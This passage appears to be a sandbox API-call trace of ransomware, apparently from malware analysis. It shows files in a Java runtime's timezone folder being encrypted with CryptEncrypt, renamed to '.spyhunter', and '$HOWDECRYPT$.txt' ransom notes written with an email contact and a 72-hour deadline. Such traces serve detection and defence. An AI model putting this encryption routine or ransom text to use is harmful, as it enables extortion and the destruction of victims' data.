nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e594, lpOverlapped=0x0 | out: lpBuffer=0x57e5d4*, lpNumberOfBytesWritten=0x57e594*=0x4, lpOverlapped=0x0) returned 1 [0170.406] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e594, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e594*=0x30, lpOverlapped=0x0) returned 1 [0170.406] CloseHandle (hObject=0xa0) returned 1 [0170.406] GetProcessHeap () returned 0x2c0000 [0170.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.406] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal.spyhunter") returned 70 [0170.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montreal"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montreal.spyhunter")) returned 1 [0170.407] GetProcessHeap () returned 0x2c0000 [0170.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.407] GetProcessHeap () returned 0x2c0000 [0170.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.407] GetProcessHeap () returned 0x2c0000 [0170.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4e48 | out: hHeap=0x2c0000) returned 1 [0170.408] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5d0 | out: pbBuffer=0x57e5d0) returned 1 [0170.408] GetProcessHeap () returned 0x2c0000 [0170.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.408] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5c8*=0x30) returned 1 [0170.408] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mazatlan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.408] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan") returned 60 [0170.408] StrStrW (lpFirst="Mazatlan", lpSrch=".txt") returned 0x0 [0170.408] GetProcessHeap () returned 0x2c0000 [0170.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.409] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e58c*=0x348, lpOverlapped=0x0) returned 1 [0170.751] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffcb8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.752] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x348, lpNumberOfBytesWritten=0x57e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e58c*=0x348, lpOverlapped=0x0) returned 1 [0170.822] GetProcessHeap () returned 0x2c0000 [0170.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.822] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.822] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e58c, lpOverlapped=0x0 | out: lpBuffer=0x57e5cc*, lpNumberOfBytesWritten=0x57e58c*=0x4, lpOverlapped=0x0) returned 1 [0170.822] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e58c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e58c*=0x30, lpOverlapped=0x0) returned 1 [0170.822] CloseHandle (hObject=0xa0) returned 1 [0170.822] GetProcessHeap () returned 0x2c0000 [0170.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.822] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan.spyhunter") returned 70 [0170.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mazatlan"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mazatlan.spyhunter")) returned 1 [0170.823] GetProcessHeap () returned 0x2c0000 [0170.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.823] GetProcessHeap () returned 0x2c0000 [0170.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.823] GetProcessHeap () returned 0x2c0000 [0170.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed48d0 | out: hHeap=0x2c0000) returned 1 [0170.823] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5d0 | out: pbBuffer=0x57e5d0) returned 1 [0170.823] GetProcessHeap () returned 0x2c0000 [0170.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.824] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5c8*=0x30) returned 1 [0170.824] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\lima"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.824] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima") returned 56 [0170.824] StrStrW (lpFirst="Lima", lpSrch=".txt") returned 0x0 [0170.824] GetProcessHeap () returned 0x2c0000 [0170.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.824] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e58c*=0xb9, lpOverlapped=0x0) returned 1 [0170.825] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.825] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x57e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e58c*=0xb9, lpOverlapped=0x0) returned 1 [0170.825] GetProcessHeap () returned 0x2c0000 [0170.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.826] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.826] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e58c, lpOverlapped=0x0 | out: lpBuffer=0x57e5cc*, lpNumberOfBytesWritten=0x57e58c*=0x4, lpOverlapped=0x0) returned 1 [0170.826] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e58c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e58c*=0x30, lpOverlapped=0x0) returned 1 [0170.826] CloseHandle (hObject=0xa0) returned 1 [0170.826] GetProcessHeap () returned 0x2c0000 [0170.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.826] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima.spyhunter") returned 66 [0170.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\lima"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\lima.spyhunter")) returned 1 [0170.827] GetProcessHeap () returned 0x2c0000 [0170.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.827] GetProcessHeap () returned 0x2c0000 [0170.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.827] GetProcessHeap () returned 0x2c0000 [0170.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8d40 | out: hHeap=0x2c0000) returned 1 [0170.827] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5c8 | out: pbBuffer=0x57e5c8) returned 1 [0170.827] GetProcessHeap () returned 0x2c0000 [0170.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.827] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5c0*=0x30) returned 1 [0170.827] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\la_paz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.828] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz") returned 58 [0170.828] StrStrW (lpFirst="La_Paz", lpSrch=".txt") returned 0x0 [0170.828] GetProcessHeap () returned 0x2c0000 [0170.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.828] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e584*=0x51, lpOverlapped=0x0) returned 1 [0170.829] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffaf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.829] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x57e584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e584*=0x51, lpOverlapped=0x0) returned 1 [0170.829] GetProcessHeap () returned 0x2c0000 [0170.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.829] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.829] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e584, lpOverlapped=0x0 | out: lpBuffer=0x57e5c4*, lpNumberOfBytesWritten=0x57e584*=0x4, lpOverlapped=0x0) returned 1 [0170.829] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e584, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e584*=0x30, lpOverlapped=0x0) returned 1 [0170.829] CloseHandle (hObject=0xa0) returned 1 [0170.831] GetProcessHeap () returned 0x2c0000 [0170.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.831] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz.spyhunter") returned 68 [0170.831] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\la_paz"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\la_paz.spyhunter")) returned 1 [0170.834] GetProcessHeap () returned 0x2c0000 [0170.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.834] GetProcessHeap () returned 0x2c0000 [0170.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.834] GetProcessHeap () returned 0x2c0000 [0170.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8c80 | out: hHeap=0x2c0000) returned 1 [0170.834] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.835] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0170.835] WriteFile (in: hFile=0xa0, lpBuffer=0x57e4fb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e624, lpOverlapped=0x0 | out: lpBuffer=0x57e4fb*, lpNumberOfBytesWritten=0x57e624*=0x127, lpOverlapped=0x0) returned 1 [0170.836] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0170.836] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e624, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e624*=0x2ac, lpOverlapped=0x0) returned 1 [0170.836] CloseHandle (hObject=0xa0) returned 1 [0170.836] GetProcessHeap () returned 0x2c0000 [0170.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea728 | out: hHeap=0x2c0000) returned 1 [0170.836] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5c0 | out: pbBuffer=0x57e5c0) returned 1 [0170.836] GetProcessHeap () returned 0x2c0000 [0170.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.836] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5b8*=0x30) returned 1 [0170.836] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\monticello"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.859] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello") returned 71 [0170.859] StrStrW (lpFirst="Monticello", lpSrch=".txt") returned 0x0 [0170.859] GetProcessHeap () returned 0x2c0000 [0170.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.859] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e57c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e57c*=0x4ec, lpOverlapped=0x0) returned 1 [0170.860] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.860] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4ec, lpNumberOfBytesWritten=0x57e57c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e57c*=0x4ec, lpOverlapped=0x0) returned 1 [0170.860] GetProcessHeap () returned 0x2c0000 [0170.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.860] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.861] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e57c, lpOverlapped=0x0 | out: lpBuffer=0x57e5bc*, lpNumberOfBytesWritten=0x57e57c*=0x4, lpOverlapped=0x0) returned 1 [0170.861] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e57c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e57c*=0x30, lpOverlapped=0x0) returned 1 [0170.861] CloseHandle (hObject=0xa0) returned 1 [0170.861] GetProcessHeap () returned 0x2c0000 [0170.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.861] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello.spyhunter") returned 81 [0170.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\monticello"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\monticello.spyhunter")) returned 1 [0170.904] GetProcessHeap () returned 0x2c0000 [0170.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.904] GetProcessHeap () returned 0x2c0000 [0170.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.904] GetProcessHeap () returned 0x2c0000 [0170.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d7d0 | out: hHeap=0x2c0000) returned 1 [0170.904] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.905] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0170.905] WriteFile (in: hFile=0xa0, lpBuffer=0x57e4f3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e61c, lpOverlapped=0x0 | out: lpBuffer=0x57e4f3*, lpNumberOfBytesWritten=0x57e61c*=0x127, lpOverlapped=0x0) returned 1 [0170.906] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0170.906] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e61c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e61c*=0x2ac, lpOverlapped=0x0) returned 1 [0170.906] CloseHandle (hObject=0xa0) returned 1 [0170.906] GetProcessHeap () returned 0x2c0000 [0170.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea640 | out: hHeap=0x2c0000) returned 1 [0170.906] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5b8 | out: pbBuffer=0x57e5b8) returned 1 [0170.907] GetProcessHeap () returned 0x2c0000 [0170.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.911] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5b0*=0x30) returned 1 [0170.912] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\winamac"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.912] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac") returned 67 [0170.912] StrStrW (lpFirst="Winamac", lpSrch=".txt") returned 0x0 [0170.912] GetProcessHeap () returned 0x2c0000 [0170.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.912] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e574, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e574*=0x3a4, lpOverlapped=0x0) returned 1 [0170.990] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffc5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.990] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x3a4, lpNumberOfBytesWritten=0x57e574, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e574*=0x3a4, lpOverlapped=0x0) returned 1 [0170.990] GetProcessHeap () returned 0x2c0000 [0170.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.990] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.990] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e574, lpOverlapped=0x0 | out: lpBuffer=0x57e5b4*, lpNumberOfBytesWritten=0x57e574*=0x4, lpOverlapped=0x0) returned 1 [0170.990] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e574, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e574*=0x30, lpOverlapped=0x0) returned 1 [0170.991] CloseHandle (hObject=0xa0) returned 1 [0170.991] GetProcessHeap () returned 0x2c0000 [0170.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.991] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac.spyhunter") returned 77 